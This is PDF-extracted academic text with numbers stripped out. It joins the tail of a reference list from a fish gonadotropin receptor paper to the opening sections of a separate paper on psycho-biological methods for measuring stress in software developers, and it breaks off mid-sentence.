gonadotropins. general and comparative endocrinology – . (https://doi.org/ . /j. ygcen. . . ) trudeau vl. neuroendocrine regulation of gonadotrophin ii release and gonadal growth in the goldfish, carassius auratus. reviews of reproduction – . (https://doi.org/ . /ror. . ) bobe j, maugars g, nguyen t, rime h & jalabert b. rainbow trout follicular maturational competence acquisition is associated with an increased expression of follicle stimulating hormone receptor and insulin-like growth factor messenger rnas. molecular reproduction and development – . (https://doi.org/ . / mrd. ) kwok hf, so wk, wang y & ge w. zebrafish gonadotropins and their receptors: i. cloning and characterization of zebrafish follicle-stimulating hormone and luteinizing hormone receptors- evidence for their distinct functions in follicle development. biology of reproduction – . (https://doi.org/ . / biolreprod. . ) nagahama y & yamashita m. regulation of oocyte maturation in fish. development, growth and differentiation s –s . (https://doi.org/ . /j. - x. . .x) scott ap, sumpter jp & hardiman pa. hormone changes during ovulation in the rainbow trout (salmo gairdneri richardson). general and comparative endocrinology – . (https://doi. org/ . / - ( ) - ) sarkar s, bhattacharya d, juin sk & nath p. biological properties of indian walking catfish (clarias batrachus) (l.) gonadotropins in female reproduction. fish physiology and biochemistry – . (https://doi.org/ . /s - - - ) this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . / - ( ) -h https://doi.org/ . / - ( ) -h https://doi.org/ . /bioinformatics/ . . https://doi.org/ . /bioinformatics/ . . https://doi.org/ . /molbev/msw https://doi.org/ . /molbev/msw https://doi.org/ . /nprot. . https://doi.org/ . / - - - https://doi.org/ . /j.ygcen. . . https://doi.org/ . /j.ygcen. . . https://doi.org/ . / - ( ) - https://doi.org/ . /biolreprod. . https://doi.org/ . /a: https://doi.org/ . /a: https://doi.org/ . /jpn. https://doi.org/ . /bf https://doi.org/ . /biolreprod. . https://doi.org/ . /j.gene. . . https://doi.org/ . /journal.pone. https://doi.org/ . /journal.pone. https://doi.org/ . /j.mce. . . https://doi.org/ . /j.mce. . . https://doi.org/ . /j.ygcen. . . https://doi.org/ . /j.ygcen. . . https://doi.org/ . /j.ygcen. . . https://doi.org/ . /j.ygcen. . . https://doi.org/ . /biolreprod. . https://doi.org/ . /journal.pone. https://doi.org/ . /joe- - https://doi.org/ . /joe- - https://doi.org/ . /biolreprod . . https://doi.org/ . /biolreprod . . https://doi.org/ . /b:fish. . . https://doi.org/ . /fishsci. .sup _ https://doi.org/ . /fishsci. .sup _ https://doi.org/ . /s - ( ) - https://doi.org/ . /s - ( ) - https://doi.org/ . /j.ygcen. . . https://doi.org/ . /j.ygcen. . . https://doi.org/ . /j.ygcen. . . https://doi.org/ . /j.ygcen. . . https://doi.org/ . /ror. . https://doi.org/ . /mrd. https://doi.org/ . /mrd. https://doi.org/ . /biolreprod. . https://doi.org/ . /biolreprod. . https://doi.org/ . /j. - x. . .x https://doi.org/ . / - ( ) - https://doi.org/ . / - ( ) - https://doi.org/ . /s - - - https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs pb– : moyle wr, campbell rk, myers rv, bernard mp, han y & wang x. co-evolution of ligand-receptor pairs. nature – . (https://doi.org/ . / a ) hausken kn, tizon b, shpilman m, barton s, decatur w, plachetzki d, kavanaugh s, ul-hasan s, levavi-sivan b & sower sa. cloning and characterization of a second lamprey pituitary glycoprotein hormone, thyrostimulin (gpa /gpb ). general and comparative endocrinology – . (https://doi. org/ . /j.ygcen. . . ) buechi hb & bridgham jt. evolution of specificity in cartilaginous fish glycoprotein hormones and receptors. general and comparative endocrinology – . (https://doi.org/ . /j. ygcen. . . ) aizen j, kowalsman n, kobayashi m, hollander l, sohn yc, yoshizaki g, niv my & levavi-sivan b. experimental and computational study of inter- and intra-species specificity of gonadotropins for various gonadotropin receptors. molecular and cellular endocrinology – . (https://doi.org/ . /j. mce. . . ) rocha a, gomez a, zanuy s, cerda-reverter jm & carrillo m. molecular characterization of two sea bass gonadotropin receptors: cdna cloning, expression analysis, and functional activity. molecular and cellular endocrinology – . (https://doi. org/ . /j.mce. . . ) so wk, kwok hf & ge w. zebrafish gonadotropins and their receptors: ii. cloning and characterization of zebrafish follicle- stimulating hormone and luteinizing hormone subunits – their spatial-temporal expression patterns and receptor specificity. biology of reproduction – . (https://doi.org/ . / biolreprod. . ) vischer hf, granneman jcm, linskens mhk, schulz rw & bogerd j. both recombinant african catfish lh and fsh are able to activate the african catfish fsh receptor. journal of molecular endocrinology – . (https://doi.org/ . /jme. . ) vischer hf, teves acc, ackermans jcm, van dijk w, schulz rw & bogerd j. cloning and spatiotemporal expression of the follicle- stimulating hormone beta subunit complementary dna in the african catfish (clarias gariepinus). biology of reproduction – . (https://doi.org/ . /biolreprod. . ) golan m, martin ao, mollard p & levavi-sivan b. anatomical and functional gonadotrope networks in the teleost pituitary. scientific reports . (https://doi.org/ . /srep ) golan m, zelinger e, zohar y & levavi-sivan b. architecture of gnrh-gonadotrope-vasculature reveals a dual mode of gonadotropin regulation in fish. endocrinology – . (https://doi. org/ . /en. - ) smits g, campillo m, govaerts c, janssens v, richter c, vassart g, pardo l & costagliola s. glycoprotein hormone receptors: determinants in leucine-rich repeats responsible for ligand specificity. embo journal – . (https://doi.org/ . /emboj/ cdg ) brüser a, schulz a, rothemund s, ricken a, calebiro d, kleinau g & schöneberg t. the activation mechanism of glycoprotein hormone receptors with implications in the cause and therapy of endocrine diseases. journal of biological chemistry – . (https:// doi.org/ . /jbc.m . ) jiang x, dias ja & he x. structural biology of glycoprotein hormones and their receptors: insights to signaling. molecular and cellular endocrinology – . (https://doi.org/ . /j. mce. . . ) costagliola s, urizar e, mendive f & vassart g. specificity and promiscuity of gonadotropin receptors. reproduction – . (https://doi.org/ . /rep. . ) sambroni e, le gac f, breton b & lareyre jj. functional specificity of the rainbow trout (oncorhynchus mykiss) gonadotropin receptors as assayed in a mammalian cell line. journal of endocrinology – . (https://doi.org/ . /joe- - ) kumar rs, ijiri s & trant jm. molecular biology of the channel catfish gonadotropin receptors: . complementary dna cloning, functional expression, and seasonal gene expression of the follicle- stimulating hormone receptor. biology of reproduction – . (https://doi.org/ . /biolreprod . . ) moles g, zanuy s, munoz i, crespo b, martinez i, mananos e & gomez a. receptor specificity and functional comparison of recombinant sea bass (dicentrarchus labrax) gonadotropins (fsh and lh) produced in different host systems. biology of reproduction – . (https://doi.org/ . /biolreprod. . ) ohkubo m, yabu t, yamashita m & shimizu a. molecular cloning of two gonadotropin receptors in mummichog fundulus heteroclitus and their gene expression during follicular development and maturation. general and comparative endocrinology – . (https://doi.org/ . /j.ygcen. . . ) kobayashi t & andersen Ø. the gonadotropin receptors fsh-r and lh-r of atlantic halibut (hippoglossus hippoglossus), : isolation of multiple transcripts encoding full-length and truncated variants of fsh-r. general and comparative endocrinology – . (https://doi.org/ . /j.ygcen. . . ) oba y, hirai t, yoshiura y, yoshikuni m, kawauchi h & nagahama y. the duality of fish gonadotropin receptors: cloning and functional characterization of a second gonadotropin receptor cdna expressed in the ovary and testis of amago salmon (oncorhynchus rhodurus). biochemical and biophysical research communications – . (https://doi.org/ . /bbrc. . ) ko h, park w, kim dj, kobayashi m & sohn yc. biological activities of recombinant manchurian trout fsh and lh: their receptor specificity, steroidogenic and vitellogenic potencies. journal of molecular endocrinology – . (https://doi.org/ . / jme. . ) received in final form september accepted october accepted preprint published online october this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . / a https://doi.org/ . /j.ygcen. . . https://doi.org/ . /j.ygcen. . . https://doi.org/ . /j.ygcen. . . https://doi.org/ . /j.ygcen. . . https://doi.org/ . /j.mce. . . https://doi.org/ . /j.mce. . . https://doi.org/ . /j.mce. . . https://doi.org/ . /j.mce. . . https://doi.org/ . /biolreprod. . https://doi.org/ . /biolreprod. . https://doi.org/ . /jme. . https://doi.org/ . /biolreprod. . https://doi.org/ . /srep https://doi.org/ . /en. - https://doi.org/ . /en. - https://doi.org/ . /emboj/cdg https://doi.org/ . /emboj/cdg https://doi.org/ . /jbc.m . https://doi.org/ . /jbc.m . https://doi.org/ . /j.mce. . . https://doi.org/ . /j.mce. . . https://doi.org/ . /rep. . https://doi.org/ . /joe- - https://doi.org/ . /biolreprod . . https://doi.org/ . /biolreprod. . https://doi.org/ . /j.ygcen. . . https://doi.org/ . /j.ygcen. . . https://doi.org/ . /bbrc. . https://doi.org/ . /jme. . https://doi.org/ . /jme. . https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com abstract introduction materials and methods cloning of cfshr and clhcgr and phylogenetic analysis structural modeling of cfshr and clhcgr fish rna extraction and real-time pcr tissue distribution of carp lhcgr and fshr cos- reporter assays recombinant gonadotropins used in this study isolation of carp ovarian follicles and steroid elisa statistical analyses results molecular cloning, tissue distribution, and d models of the carp gthrs functional activation and characterization of carp fshr and lhcgr expression of ovarian fshr and lhcgr during sexual maturation in female carp relationships between pituitary mrna levels of pituitary gths, ovarian gth-rs, and gsi in vitro effect of carp recombinant gths on gvbd of preovulatory follicles discussion supplementary data declaration of interest funding references a methodology for psycho-biological assessment of stress in software engineering a methodology for psycho-biological assessment of stress in software engineering jan-peter ostberg , daniel graziotin , stefan wagner and birgit derntl institute of software engineering, university of stuttgart, stuttgart, germany department of psychiatry and psychotherapy, university of tübingen, tübingen, germany abstract stress pervades our everyday life to the point of being considered the scourge of the modern industrial world. the effects of stress on knowledge workers causes, in short term, performance fluctuations, decline of concentration, bad sensorimotor coordination, and an increased error rate, while long term exposure to stress leads to issues such as dissatisfaction, resignation, depression and general psychosomatic ailment and disease. software developers are known to be stressed workers. stress has been suggested to have detrimental effects on team morale and motivation, communication and cooperation-dependent work, software quality, maintainability, and requirements management. there is a need to effectively assess, monitor, and reduce stress for software developers. while there is substantial psycho-social and medical research on stress and its measurement, we notice that the transfer of these methods and practices to software engineering has not been fully made. for this reason, we engage in an interdisciplinary endeavor between researchers in software engineering and medical and social sciences towards a better understanding of stress effects while developing software. this article offers two main contributions. first, we provide an overview of supported theories of stress and the many ways to assess stress in individuals. second, we propose a robust methodology to detect and measure stress in controlled experiments that is tailored to software engineering research. we also evaluate the methodology by implementing it on an experiment, which we first pilot and then replicate in its enhanced form, and report on the results with lessons learned. with this work, we hope to stimulate research on stress in software engineering and inspire future research that is backed up by supported theories and employs psychometrically validated measures. subjects bioinformatics, human-computer interaction, software engineering keywords stress, software development, biological markers, methodology, psychological assessment, effects of stress introduction our modern industrialized world is moving fast and demands a lot from the workers within its system, which leaves them stressed out. some consider stress the scourge of the modern industrial world (de jonge et al., ). stress is a response to exceeding demands placed upon the body or mind (selye, ). it is well known that stress is highly related to the deterioration of physical and mental health (sonnentag et al., ; how to cite this article ostberg j-p, graziotin d, wagner s, derntl b. . a methodology for psycho-biological assessment of stress in software engineering. peerj comput. sci. :e doi . /peerj-cs. submitted december accepted july published august corresponding author jan-peter ostberg, jan-peter.ostberg@informatik. uni-stuttgart.de academic editor arie van deursen additional information and declarations can be found on page doi . /peerj-cs. copyright ostberg et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:jan-peter.�ostberg@�informatik.�uni-stuttgart.�de mailto:jan-peter.�ostberg@�informatik.�uni-stuttgart.�de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ kaufmann, pornschlegel & udris, ). individuals who perceive a large amount of stress have an increased risk of premature death, coronary heart disease, and mental disorders such as depression or burn-out, as the world health organization realized as early as world health organization and others ( ) and continued to investigate the problem (world health organization, ). stress as well as the mere anticipation of stress (hyun, sliwinski & smyth, ) also has a negative impact on the quality of products, as it increases workers error rates (akula & cusick, ). workplace environments that are characterized by physical work have been improved over time by research on ergonomic tools as well as their placement to lessen physical strain, and alternation of tasks and restructuring of processes to counter dulling repetitive work. the aim is the replenishment of physical and cognitive resources which were consumed by the stressful tasks. still, the stress experienced by knowledge workers, like software developers, has a wide range of research opportunities in terms of understanding and preventing generation of (chronic) stress and its effects (meier et al., ; ostberg et al., ). software developers are stressed workers. short time to market, requirements originating from legislators leading to high penalty payments, fast-changing technological environments (chilton, hardgrave & armstrong, ), the need to plan for software legacy and obsolescence and interaction with customers (rajeswari & anantharaman, ), as well as possible time zone, linguistic, and cultural differences (amin et al., ) are just the tip of the iceberg for potential long-term stressors in software development. day to day stressors such as cryptic error messages, unintuitive integrated development environments (ides), changing requirements which cause high cognitive stain, should be kept as low as possible to avoid an additional burden to body and mind (graziotin et al., ). stress has been suggested to have detrimental effects on defect rates, team morale as well as motivation, software quality, maintainability, and requirements management (meier et al., ). while short-term stress can be pushing and beneficial to software engineers, preliminary research suggests that we should find ways to reduce stress and develop tools for software development that help to reduce stress or at least are no sources of stress (brown et al., ). we discussed ways to reduce stress of developers elsewhere (ostberg et al., ), but without strong and validated, yet easy to adopt methodologies to detect, assess, and understand stress responses of individuals and groups of developers, it is hard to produce sound statements on the efficiency of any stress reduction approach. for detecting stress, research in software engineering has focused on machine learning and data mining approaches, wearable technologies (suni lopez, condori-fernández & catala bolos, ), and ad-hoc questionnaires (meier et al., ) so far brown et al. ( ) have offered a review of the few scattered studies—but we still see some research gaps, which we highlight in the next section, in terms of discovered knowledge as well as the way we borrow from established research from other disciplines. hence, we are motivated to engage in an interdisciplinary endeavor between researchers in software engineering as well as medical and social science fields towards a better understanding of stress while developing software. ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ this article offers two main contributions. first, we provide an overview of supported theories of stress and the many ways to assess stress in individuals. second, we propose a robust methodology to detect and measure stress in controlled experiments that is tailored to software engineering research. the methodology has been supported by two controlled experiments which we report on together with lessons learned. with this work, we hope to stimulate research on stress in software engineering and inspire future research that is backed up by supported theories and employs psychometrically validated measurement instruments. related work there is substantial psycho-social and medical research on stress and its measurement (brown et al., ) but the transfer to software engineering has yet to be made. this is also due to the many medical, psychological, and biological ways to measure stress and on how to report the results (noack et al., ) creating the need for interdisciplinary work which increases the complexity of research projects. furthermore, we believe that solid theoretical and methodological foundations should be a first step towards a better understanding of stress reactions of developers, as it should be with any psychological construct. software engineering research, regretfully, is a long way from adopting rigorous and validated research artifacts. feldt et al. ( ) argued in favor of systematic studies of human aspects of software engineering, more specifically to adopt measurement instruments that come from psychology. seven years after the statement by feldt et al. ( ) and graziotin, wang & abrahamsson ( a) explained that research on the emotional responses of software developers has been threatened by a lack of understanding the underlying constructs, in particular to exchange affect-related psychological constructs such as emotions and moods with motivation, commitment and well-being. the article offers a clarification of these constructs and presents validated measures. meanwhile, lenberg, feldt & wallgren ( ) had published a systematic literature review of studies of human aspects that made use of behavioral science. they called the field behavioral software engineering and found when conducting this kind of research that there are still several knowledge gaps and that there have been very few collaborations between software engineering and social science researchers. graziotin, wang & abrahamsson ( b) have also extended their prior observations to a broader view of software engineering research. given, that much research in the field has misinterpreted, if not ignored, validated methodology and measurement instruments coming from psychology, the work offered brief guidelines to select a theoretical framework and validated measurement instruments from psychology. this includes a thorough evaluation of the psychometric properties of candidate instruments, which was later echoed in guidelines by gren ( ) and wagner et al. ( ). wagner et al. ( ) have highlighted a major case of such misconduct, which is evident from the systematic literature review of personality research in software engineering by cruz, da silva & capretz ( ). the study review found that % of personality studies in software engineering use the myers-brigg type indicator (mbti), which was known more than years earlier to provide close to no validity and ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ reliability properties (pittenger, ), meaning that the results of about half studies of personality in software engineering research are unlikely reflecting on personality in their conclusions. the software engineering body of knowledge on stress is quite small and also lacking much understanding of the phenomenon (amin et al., ; brown et al., ), even though there are few scattered studies that we can review. prolonged exposure to stressful working conditions can lead to burnout as reported by sonnentag et al. ( ). in their sample of software professionals from companies they found factors (e.g., lack of influence, lack of career prospects or stressors resulting from organizational policy) which can increase the risk of burnout but also approaches (e.g., improvement of team communication, challenging, interesting tasks or better career opportunities) for potential stress reduction. they measured the burnout potential with a combination of three hour long structured interviews and questionnaires. fujigaki, asakura & haratani ( ) looked at the stress levels of japanese information system managers in software development. they reported stressors originating from the manager role as well as from the developer role. again, authors relied on questionnaire data (background data, work-stressor items, questions on software project management details, and measurement of stress response) to reveal those stressors (e.g., job overload, technical difficulties or work environment). using questionnaires, hyman et al. ( ) examined the work-life balance situation of call-centre employes and software developers in the uk. their results show that unpaid overtime is on the rise due to staff shortage or personal commitment to finish the task at hand by the end of the day. in their in-depth analysis of post-war british industry they find that, as most employes do not draw their happiness from work, the work-life balance becomes more and more important, but harder to achieve, prompting additional stress in the lives of information and knowledge workers. a similar approach was adopted by rajeswari & anantharaman ( ). they again used a questionnaire with questions compiled of renowned papers from the field of research to survey indian software professionals to identify potential stress factors. the factors (fear of obsolescence, individual team interactions, client interactions, work-family interference, role overload, work culture, technical constraints, family support towards career, workload, technical risk propensity) they present in their work cover all aspects from social problems to skill related problems. this shows that these none- development related stressors will come on top of the development related problems we have identified in the introduction. amin et al. ( ) published a brief literature review of stress and what its role might be in the context of global software development. the authors talk about the importance of studying occupational stress among software engineers given their nature as intellectual workers, in particular on their activities of knowledge sharing, which they found to be most likely to be obstructed by stress-related effects. the authors conclude their review with a proposition to be further expanded by future work, that is, “in a (global software development) environment, with time zone differences, linguistic differences, ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ technological issues, cultural issues and lack of trust, se occupational stress will be higher and will impede knowledge sharing.” (p. ). to our knowledge, no follow-up study exists. müller & fritz ( ) used bio-markers to determine the difficulty of understanding a piece of code and, based on that, predict the consequences for the quality of the code. they utilized the stress indicator of heart rate changes to assess the difficulty to understand the currently examined code by a participant. they observed a statistically significant connection between bio markers of stress and the resulting code quality. in a previous study fritz et al. ( ) were monitoring the brain waves of the participants. the results show that it is possible to predict the perceived difficulty of a task based on psycho- physiological markers. as the difficulty of a task can be a stressor, brain waves are an interesting indicator to measure. however, this kind of study needs specialized equipment, making it hard to be used on groups and the analysis of the results is very complex. the influence of stress on the ability to think, memorize and concentrate has been examined by behroozi et al. ( ) as stressing event. behroozi et al. ( ) used technical interviews, using a whiteboard as a tool to communicate complex ideas. they used eye tracking to measure the fixations on areas of the whiteboard. the number of fixations on different areas increased under pressure indicating a lowered ability to concentrate, as the participants had to go back to previous sections more often. suni lopez, condori-fernández & catala bolos ( ) conducted a study towards the implementation of a real-time stress-detector system based on wearable devices but following an arousal-based statistical approach as opposed to previous studies, applying machine learning for understanding emotional states and stress. the validation study adopted an ad-hoc -point ordinal scale for stress detection (from “not stressed” to “extremely (stressed)”) and could obtain an accuracy of % using the arousal-based model. they found that the collaborative practices in agile might be a great source of stress. therefore, they conducted a nationwide swiss questionnaire on agile adoption in it, where they asked (among other things) how agile software development influenced participants’ stress at work. stress was assessed using an ad-hoc single item, ranging from (significantly less stressed) to (significantly more stressed). the research analyzes correlations between the stress item and agile practices, finding that, for example, high stress levels have a negative effect on team moral. from our examples of related work and the growing rate at which stress research in this area is conducted, we conclude that stress is a topic of interest in the computer science community. while all previous studies contributed to our understanding, there are indications that software engineering has been avoiding using robust and validated methodology for stress detection and psychological issues in general, thus threatening the validity and reliability of studies (graziotin, wang & abrahamsson, b). most of these studies use non-standard, ad-hoc, and non psychometrically validated questionnaires to assess the stress reaction, either by self-report or a number of questions aimed to derive the personal stress level. the use of such calls for a rather large group of participants to increase the probability to be able to report significant results. also, the analysis of the questionnaires ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ leaves space for interpretation as they tend to differ from study to study and thus make it difficult to compare different studies by different researchers. with our article and the following proposed method,we aim to critically extend the comparability of study results and hopefully overcome some of the previous limitations. background in the following, we will provide a definition of stress and different ways to measure it. we think it is important to have this background knowledge prior to designing sound studies. also, the information provided can help researchers who are not trained in medicine and psychology to better understand their stress target in the design phase to assess if our proposed method is adequate for their topic of research. definition of stress stress has been viewed from medical, psychological and organizational angles resulting in many definitions. the most general definition of stress is the general adaptation syndrome (gas) defined by selye ( ). the gas definition can fit every scenario from personal short-time stress event to global long-term scenarios, and it was based on a formulation by weinert ( ) with an organizational and workforce psychology view. in the following we focus more closely to weinert’s explanation of gas, as it does not dive as deep as selye into medical details and, hence, is easier to understand for an audience without medical background. stress is “… an adaptive reaction to exceeding mental or physical demands of the surroundings. adaptive, because the resilience towards those demands is individually different.” (weinert, ). weinert ( ) derives that definition from these factors of stress: . stress needs a physical or psychosocial trigger event. . individuals react differently to that trigger event. . constraints and demands are linked to the build-up of stress. constraints and demands are, for example, deadlines or quality requirements connected to the trigger. however, this does not mean that every event that fits the above definition necessarily affects a person. in this context, commonly mentioned conditions for people to be affected by stress are (weinert, ): � the outcome or consequences of the trigger event must not be known beforehand. if the result of the stressful event is perceived as “unchangeable” it will generate no or much less stress compared to the same event with an uncertain outcome. � the outcome or consequences of the stressor have to have an influence, either good or bad. this becomes most obvious in high-stake scenarios, for example at war, were for example, erwin rommel said: “don’t fight a battle if you don’t gain anything by winning.” (rommel & pimlott, ). ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for better understanding, let us make an example related to software development: a software product is due to be released to an important customer. the future of the company depends on this commercial operation because funds are running out. it is not known yet whether or not the customer will buy the product in the current state. the trigger event in our example is the prompt release of the product (deadline). the consequences of the stressor are not known, as it is not clear if the product will be sold, at what price and if this sale will keep the company financially afloat. the outcome is important to the developer because his/her job might depend on it. each person in the company might experience a different level of stress connected to this scenario based, for example, on their individual judgement of the ease of finding a new job if the project is not successful and the company goes bankrupt. if a person has already taken mental dismissal and is sure to find a new job or already has a new job he/she might not experience any stress at all. the gas can be used to model every stress interaction in general. as in the example above, it can be used to view the impact of stress (the critical release of the software product) on the company as a whole. a more narrow focus is the theory of lazarus ( ) which refines the idea of selye. by narrowing the reaction to a stressor to the cognitive processes active when dealing with stress (transactional or cognitive stress theory), this model is closer to the situation of knowledge workers such as software developers than the generalized model of selye. in the transactional model, if a situation is assessed to be a strain, the situation can be considered as already harming, potentially harming (threatening) or as a risky, but worthwhile, challenge. the assessment and the progress of the situation based on the personal resources and the possible solutions for coping with the stressor can change over time. based on these possibilities an actual reaction is provoked. this reaction to the stressor is, in the best case, a direct action to solve the stressful situation (fight) or, in less favorable constellations, evasion (flight) of the situation or other coping strategies (e.g., trivialization). this cycle of assessment based on the changing surroundings and continuous evaluation of coping strategies will be repeated until an appropriate coping strategy is found, which ends the stressing encounter. if no fitting coping strategy can be found, the person is either blocked by the continuing search cycle or through the application of unfitting solutions, with a high usage of resources, the problem is gradually eroded until it can be completely overcome. let us again imagine a software engineering example for this stress model: a new member of a development team has been assigned to the first task in the project. it is a non-trivial part of the system to be implemented and it is the developer’s chance to prove his/her worth to the team. after the situation was found to be stressful, a second assessment of the problem reveals that the new member feels a lack of skills needed to finish the given task properly ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (situation assessed to be threatening). despite that feeling he/she still starts working on the problem (coping). the new team member is working on the problem and his/her knowledge and skills increase as he/she is going and the assessment of the situation may change to “risky but worthwhile”. the assessment can change again in the course of action, for example if the new member encounters a problem which can not be fixed easily. the assessment can then again rise to threatening or even harmful, depending on the personal resources available. still the assessment will continue until the situation is solved one way or another. it is important to keep these definitions of stress in mind when designing a study or experiment which aims to measure stress because we need to be aware of the stress generation, which is still not fully understood (noack et al., ). most of the time we will already have a stressor we want to take a look at (e.g., project deadlines), but to keep that stressor as free from other influences as possible, and for a correct interpretation of the results later on, we need to look at potential constraints and demands which might not affect all participants in the same way. we also have to find a way to make the participant care about the outcome of the stressor if it is an artificially created stressor. there are some commonly used ways to induce stress in experiments like the trier social stress test (kirschbaum, ) which uses social evaluation and cognitive demands to generate stress. another way can be to create a competitive scenario in which participants can earn a reward based on their results on a task compared to the other participants. effects of stress to understand the ways to measure stress, we need to know the basic reactions of the body and mind to stress. a frequently cited summary of the general effects of stress has been written by kaufmann, pornschlegel & udris ( ). somatic psychological short-time effects include increased heart rate, raised blood pressure and adrenalin discharge. the personal psychological effects might include a feeling of strain, frustration, anger, fatigue, monotony and saturation. the individual behavior can suffer from performance fluctuation, decline of concentration ability and bad sensorimotor coordination, leading to an increased error rate. medium and long term stress exposure can lead to psychological problems such as dissatisfaction, resignation and depression and general psychosomatic ailment and disease. the negative effect of medium to long-term exposure to stress on the behavior can include increased consumption of nicotine, alcohol or drugs as well as absenteeism (sick days) on individual level and conflicts, quarrels, general aggression against others and withdrawal (isolation) at and outside of work on a social level. even short-term stress can lead to unpleasant side effects, which are especially harmful for communication and cooperation-dependent work like software development. since when kaufmann, pornschlegel & udris ( ) summarized the effects, more research has been conducted supporting and extending the understanding of stress effects mentioned by them. we will go into more detail below. ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ physical reactions the physical reactions of the human body can be explained by the survival needs of our ancestors. it is often called the “fight or flight” reflex, first introduced by cannon ( ). in stressful situations in prehistoric times, for example, the encounter with a predator, the body needs energy to fight or to run away (flight), so it releases adrenaline to the blood stream, ordering the endocrine system to start providing chemical energy. noto et al. ( ) described the effects of stress on the endocrine system focusing on cortisol and alphaamylase. in short, under stress cortisol and alphaamylase concentration increases providing additional energy to the organism (e.g., increasing the blood sugar). both these effects help the body to release chemical energy (e.g., sugar) to the blood stream. these effects are traceable in saliva. the heart rate increases (vrijkotte, van doornen & de geus, ) in stressful situations to transport the mentioned substances faster through the body as well as to provide more oxygen which is needed to utilize the chemical energy carriers freed by the cortisol and the alphaamylase. due to the increased body activity, sweat can break out, changing the dialectical conductivity of the skin as a result. sweat might also be a result of physical work which is considered a form of stress for the body. stressful exhaustion might lead to involuntary muscle contraction (tremors). but not only physical stress can lead to involuntary muscle contraction. getting tired as a result of work/stress leads to increased blinking. these are short-term reactions. if these-short term effects are prolonged, they can have negative effects on the human body. commonly mentioned effects of long-term stress on the human body are: high blood pressure, high cholesterol values and heart diseases (weinert, ; kaufmann, pornschlegel & udris, ; richter & hacker, ). the physical reactions of the human body to stressful events can change based on the demands and resources (e.g., a more muscular person might endure physically demanding work longer than the average person). most of the reactions to stress are internal, steered by the hormone system. the increase of these chemical messengers can be utilized as a measurement as they remain in the blood and also in saliva and urine for some time. psychological reactions if the stressing situation prevails, it has negative short and long-term effects not only on the body but also on mental health. mental health problems related to stress are on the rise in the modern world as shown by lademann, mertesacker & gebhardt ( ) in their analysis of the sick notes submitted to health insurances or in the stress report for germany (lohmann-haislah, ) which gives a yearly overview of the stress situation of the german workforce. cohen ( ) wrote a summary of the research on stress effects so far. among other topics, he wrote about after-effects on the social behavior of stress plagued persons. he reported about various experiments where the participants previously exposed to stress showed significantly less helpfulness and empathy as well as higher levels of aggression towards other people. amongst others, weinert ( ) listed as psychological effects of stress (similar to the definitions seen in “effects of stress”): poor concentration, difficulty where not explicitly cited, the reference is taken from the textbook “biologische psychologie” by birbaumer & schmidt ( ). ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ making decisions, obliviousness, thought blockades and burnout as well as subjectively experienced anxiety and lethargy. the authors focused on the negative aspects of prolonged exposure, but should not forget that short-term stress also has positive effects, like increased motivation and energy as discussed by folkman ( ). also, both stress reactions are subjected to individual perception of stress. the perception of stress can be modified by, for example, changes at the workplace such as placement of tools or changing working positions. it is also bound to personal stress resilience, which can be genetic or mental, but can be increased by focused training. stress is a multi-faceted phenomenon which makes it challenging to measure. there are many methods proposed by researchers from distinct science branches and interdisciplinary research, for example by kanner et al. ( ), lazarus ( ), cohen, janicki-deverts & miller ( ) and plarre et al. ( ). stress measurement techniques as we have seen in the previous section, stress is a multifaceted construct that can be defined in different ways according to different disciplines. following the work by cohen, kessler & gordon ( ), the measurement of stress is split into mainly using psychological measurements, such as questionnaires, and mainly using measurements of biological markers, such as hormone levels and psycho-physiological reactions (vrijkotte, van doornen & de geus, ). psychological measurements many different variations of psychological measurements of stress have been discussed over time (cohen, kamarck & mermelstein, ; peacock & wong, ; kanner et al., ). psychological measurements can be grouped into two classes: those which assess long-term stress (e.g., life changing events by rahe ( )) and short-term stress (e.g., emotional self rating by schneider et al. ( )) based on self report and concrete situations, and those which look at more global coping strategies of participant who are not directly connected to a specific trigger (e.g., stressverarbeitungsfragebogen by janke, erdmann & boucsein ( )). the long-term assessment strategies are used to investigate the impact of stress on the well-being or health of individuals. this method uses interviews or tests that should represent the overall picture of the stressful events in someone’s life, for example, the death of a loved one or job loss. the short-term assessment strategies try to assess the stress experienced for some minutes up to an entire day by at least two questionnaires or interviews, ideally before and after the stressful event. the items used in these tests range from a plain assessment by the participant on the momentary stress level on a scale from to to more episodic tales of events including the points of why this event was found to be stressing, how severe and long the stress was felt. this kind of data collection is used regularly in psychology as well as medical research and is commonly considered as reliable given good psychometric properties. ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ an example from the software engineering point of view to distinguish between long and short-term term stress assessment could be the difference between keeping track of a whole development project, taking a sample each day and assessing the stress of a single -h programing session. the 